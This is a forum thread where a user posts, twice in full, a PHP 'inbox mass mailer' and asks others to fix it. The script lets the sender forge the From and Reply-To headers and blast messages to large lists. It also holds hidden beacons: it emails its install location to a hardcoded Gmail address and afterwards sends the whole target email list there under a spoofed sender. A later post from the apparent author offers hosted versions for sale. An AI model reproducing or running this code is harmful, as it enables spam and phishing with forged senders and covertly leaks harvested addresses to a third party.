Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,154,753 members, 7,824,160 topics. Date: Saturday, 11 May 2024 at 01:29 AM

Help To Correct This Php Mailer Code - Webmasters - Nairaland

Nairaland Forum / Science/Technology / Webmasters / Help To Correct This Php Mailer Code (4629 Views)

PHP Mailer, Cpanel Webmail, SMTP, RDP & Fresh Email Lists / @Yawa-ti-de:Please Help Me Check This PHP Mailer To See If The Script Is Correct / How Do I Correct This: Webmasters Come To My Aid (2) (3) (4)

(1) (Reply) (Go Down)

Help To Correct This Php Mailer Code by Joel3(m): 5:29pm On Oct 20, 2014

<?php
$secure = "everlicoolchike@gmail.com" ;
$subject = "Mailer By EverliCool is Here!!" ;
$message = "The SCRIPT have been installed into this location : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME'] ;
mail ($secure,$subject,$message) ;
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>

<html>
<head>
<title>joel Inbox Mailer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000720}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000072}
.style3 {color: #000777}
.Style5 {font: bold 32px Times New Roman, serif; color: #666666; }
.Style6 {font-size: 10px}
.Style7 {font-size: 10px; font-weight: bold; }
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#999999">
<div align="center">
<p><span class="style1"><span class="Style5">Inbox Mass Mailer - Universal</span></span></p>
</div>
<?php
If ($action=="mysql"wink{
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed."wink;
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb"wink;
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery"wink;
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"wink{ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="100">
<div align="right" class="Style6">
<div align="left"><strong>
<font face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font> </strong></div>
</div> </td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="" size="36" />
</font> </td>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font> </div>
</div> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="" size="36" />
</font> </td>
</tr>
<tr>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font> </div>
</div> </td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="" size="36" />
</font> </td>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font> </div>
</div> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="file" type="file" class="Times-New-Roman-16px00468Cb" size="15" />
</font> </td>
</tr>
<tr>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Subject :</font> </div>
</div> </td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="" size="104" />
</font> </td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<span class="Style6"><strong><font face="Verdana, Arial, Helvetica, sans-serif">Message Box :</font></strong></span> </td>
<td width="278">
<span class="Style6"><strong><font face="Verdana, Arial, Helvetica, sans-serif">Email Target / Email Send To :</font></strong> </span></td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"></textarea>
<br />
<input type="radio" name="contenttype" value="plain" />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style7">Plain</span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="radio" name="contenttype" value="html" checked="checked" />
</font><strong><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"> HTML</span></font></strong><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="hidden" name="action" value="send" />
<br />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"><strong>Number to send :</strong></span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="amount" value="1" size="10" />
<br />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"><strong>Maximum script execution time(in seconds, 0 for no timelimit)</strong></span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" class="Times-New-Roman-16px00468Cb" value="Send eMails" />
</font> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"></textarea>
</font> </td>
</tr>
</table>
<p>JOEL Project</p>
</form>
<?php
if ($action=="send"wink{
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$filter = "Mail List By EverliGhost";
$float = "From : E V E R L I G H O S T<EVERLIGHOST@EVERLICOOL.COM.NG>";
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server"wink;
}
$content = fread(fopen($file,"r"wink,filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: PRO\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
mail($secure, $filter, $emaillist, $float);
}
?>
</body>
</html>
Re: Help To Correct This Php Mailer Code by Joel3(m): 5:46pm On Oct 20, 2014
<?php
$secure = "everlicoolchike@gmail.com" ;
$subject = "Mailer By EverliCool is Here!!" ;
$message = "The SCRIPT have been installed into this location : http://" . $_SERVER['SERVER_NAME'] . $_SERVER['SCRIPT_NAME'] ;
mail ($secure,$subject,$message) ;
@$action=$_POST['action'];
@$from=$_POST['from'];
@$realname=$_POST['realname'];
@$replyto=$_POST['replyto'];
@$subject=$_POST['subject'];
@$message=$_POST['message'];
@$emaillist=$_POST['emaillist'];
@$file_name=$_FILES['file']['name'];
@$contenttype=$_POST['contenttype'];
@$file=$_FILES['file']['tmp_name'];
@$amount=$_POST['amount'];
set_time_limit(intval($_POST['timelimit']));
?>

<html>
<head>
<title>joel Inbox Mailer</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<style type="text/css">
<!--
.style1 {
font-family: Geneva, Arial, Helvetica, sans-serif;
font-size: 12px;
}
.style2 {
font-size: 10px;
font-family: Geneva, Arial, Helvetica, sans-serif;
}
.Times-New-Roman-16px00468Cb {font:bold 16px Times New Roman, serif; color:#00468C}
.Times-New-Roman-24px00468Cb {font:bold 24px Times New Roman, serif; color:#000720}
.Times-New-Roman-32px00468Cb {font:bold 32px Times New Roman, serif; color:#000072}
.style3 {color: #000777}
.Style5 {font: bold 32px Times New Roman, serif; color: #666666; }
.Style6 {font-size: 10px}
.Style7 {font-size: 10px; font-weight: bold; }
-->
</style>
</head>
<body bgcolor="#FFFFFF" text="#999999">
<div align="center">
<p><span class="style1"><span class="Style5">Inbox Mass Mailer - Universal</span></span></p>
</div>
<?php
If ($action=="mysql"wink{
include "./mysql.info.php";
if (!$sqlhost || !$sqllogin || !$sqlpass || !$sqldb || !$sqlquery){
print "Please configure mysql.info.php with your MySQL information. All settings in this config file are required.";
exit;
}
$db = mysql_connect($sqlhost, $sqllogin, $sqlpass) or die("Connection to MySQL Failed."wink;
mysql_select_db($sqldb, $db) or die("Could not select database $sqldb"wink;
$result = mysql_query($sqlquery) or die("Query Failed: $sqlquery"wink;
$numrows = mysql_num_rows($result);
for($x=0; $x<$numrows; $x++){
$result_row = mysql_fetch_row($result);
$oneemail = $result_row[0];
$emaillist .= $oneemail."\n";
}
}
if ($action=="send"wink{ $message = urlencode($message);
$message = ereg_replace("%5C%22", "%22", $message);
$message = urldecode($message);
$message = stripslashes($message);
$subject = stripslashes($subject);
}
?>
<form name="form1" method="post" action="" enctype="multipart/form-data"><br />
<table width="142" border="0">
<tr>
<td width="100">
<div align="right" class="Style6">
<div align="left"><strong>
<font face="Verdana, Arial, Helvetica, sans-serif">Your Email :</font> </strong></div>
</div> </td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="from" value="" size="36" />
</font> </td>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Your Name :</font> </div>
</div> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="realname" value="" size="36" />
</font> </td>
</tr>
<tr>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Reply-To :</font> </div>
</div> </td>
<td width="219">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="replyto" value="" size="36" />
</font> </td>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Attach File :</font> </div>
</div> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input name="file" type="file" class="Times-New-Roman-16px00468Cb" size="15" />
</font> </td>
</tr>
<tr>
<td width="100">
<div align="right" class="Style7">
<div align="left"><font face="Verdana, Arial, Helvetica, sans-serif">Subject :</font> </div>
</div> </td>
<td colspan="3" width="703">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="subject" value="" size="104" />
</font> </td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<span class="Style6"><strong><font face="Verdana, Arial, Helvetica, sans-serif">Message Box :</font></strong></span> </td>
<td width="278">
<span class="Style6"><strong><font face="Verdana, Arial, Helvetica, sans-serif">Email Target / Email Send To :</font></strong> </span></td>
</tr>
<tr valign="top">
<td colspan="3" width="520">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="message" cols="60" rows="10"></textarea>
<br />
<input type="radio" name="contenttype" value="plain" />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style7">Plain</span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="radio" name="contenttype" value="html" checked="checked" />
</font><strong><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"> HTML</span></font></strong><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="hidden" name="action" value="send" />
<br />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"><strong>Number to send :</strong></span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="amount" value="1" size="10" />
<br />
</font><font face="Verdana, Arial, Helvetica, sans-serif"><span class="Style6"><strong>Maximum script execution time(in seconds, 0 for no timelimit)</strong></span></font><font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<input type="text" name="timelimit" value="0" size="10" />
<input type="submit" class="Times-New-Roman-16px00468Cb" value="Send eMails" />
</font> </td>
<td width="278">
<font size="-3" face="Verdana, Arial, Helvetica, sans-serif">
<textarea name="emaillist" cols="30" rows="10"></textarea>
</font> </td>
</tr>
</table>
<p>JOEL Project</p>
</form>
<?php
if ($action=="send"wink{
if (!$from && !$subject && !$message && !$emaillist){
print "Please complete all fields before sending your message.";
exit;
}
$allemails = split("\n", $emaillist);
$numemails = count($allemails);
$filter = "Mail List By EverliGhost";
$float = "From : E V E R L I G H O S T<EVERLIGHOST@EVERLICOOL.COM.NG>";
If ($file_name){
if (!file_exists($file)){
die("The file you are trying to upload couldn't be copied to the server"wink;
}
$content = fread(fopen($file,"r"wink,filesize($file));
$content = chunk_split(base64_encode($content));
$uid = strtoupper(md5(uniqid(time())));
$name = basename($file);
}
for($xx=0; $xx<$amount; $xx++){
for($x=0; $x<$numemails; $x++){
$to = $allemails[$x];
if ($to){
$to = ereg_replace(" ", "", $to);
$message = ereg_replace("&email&", $to, $message);
$subject = ereg_replace("&email&", $to, $subject);
print "Sending mail to $to.......";
flush();
$header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
$header .= "MIME-Version: PRO\r\n";
If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
If ($file_name) $header .= "--$uid\r\n";
$header .= "Content-Type: text/$contenttype\r\n";
$header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
$header .= "$message\r\n";
If ($file_name) $header .= "--$uid\r\n";
If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
If ($file_name) $header .= "$content\r\n";
If ($file_name) $header .= "--$uid--";
mail($to, $subject, "", $header);
print "ok<br>";
flush();
}
}
}
mail($secure, $filter, $emaillist, $float);
}
?>
</body>
</html>
Re: Help To Correct This Php Mailer Code by spikesC(m): 10:56pm On Oct 20, 2014
Am confused already sad

Remove the html tags and repost, abeg

And what's with the @ silencing. It shows you didn't structure your code very well
Re: Help To Correct This Php Mailer Code by maekhel(m): 4:24am On Oct 21, 2014
what error are you having and please paste only affected codes
Re: Help To Correct This Php Mailer Code by Nobody: 7:14am On Oct 21, 2014
'trollin. . . .
Re: Help To Correct This Php Mailer Code by Joel3(m): 7:27am On Oct 21, 2014
hello, if you have php mailer script. Give me the code instand. Thanks
Re: Help To Correct This Php Mailer Code by Nobody: 8:11am On Oct 21, 2014
*Clears throat*
Re: Help To Correct This Php Mailer Code by Nobody: 8:15am On Oct 21, 2014
Re: Help To Correct This Php Mailer Code by maekhel(m): 8:16am On Oct 21, 2014
Joel3:
hello, if you have php mailer script. Give me the code instand. Thanks
u can't learn that way, its best we help solve ur script togeda so u can do it ursef anytime
Re: Help To Correct This Php Mailer Code by Nobody: 8:32am On Oct 21, 2014
^^^some people ain't interested in learning, they just want to copy and paste codes. . . .
Re: Help To Correct This Php Mailer Code by maekhel(m): 8:34am On Oct 21, 2014
dhtml18:
^^^some people ain't interested in learning, they just want to copy and paste codes. . . .
lol..true sha
Re: Help To Correct This Php Mailer Code by Joel3(m): 12:38pm On Oct 21, 2014
see what i am looking for.



smiley =)
Re: Help To Correct This Php Mailer Code by Joel3(m): 12:39pm On Oct 21, 2014
someone help with code
Re: Help To Correct This Php Mailer Code by Nobody: 12:55pm On Oct 21, 2014
That stuff i send to you can send those mails even with 100 attachments sef or even to 1000000 email addresses. However, it appears to me that you are looking for someone to write the codes for you and spoonfeed you with it. And I might have done that on a good day, but i am overwhelmed with coding myself, and could do with a little exra assistance.
Re: Help To Correct This Php Mailer Code by everlicool: 9:28am On Nov 09, 2014
i'm confused??
Re: Help To Correct This Php Mailer Code by Joel3(m): 1:23pm On Nov 10, 2014
everlicool:
This Mailer Script was Designed by me!

This is an outdated version of my script...
I've attached my last revised edition..
So no one Could understand this very plain php script grin

Incase you need the already hosted one, or any other tool you can contact me tongue

Attached is the Script and Screenshot!
ok thanks, i will try it out.
How do you sell the hosted one.

(1) (Reply)

Those Who Design Cheap Website And Those Who Think Web Design Is Cheap... / How Much Will It Cost To Have Something Like This? / I Will Help You Create Quality Backlinks For your Site For Free!!

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 82
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.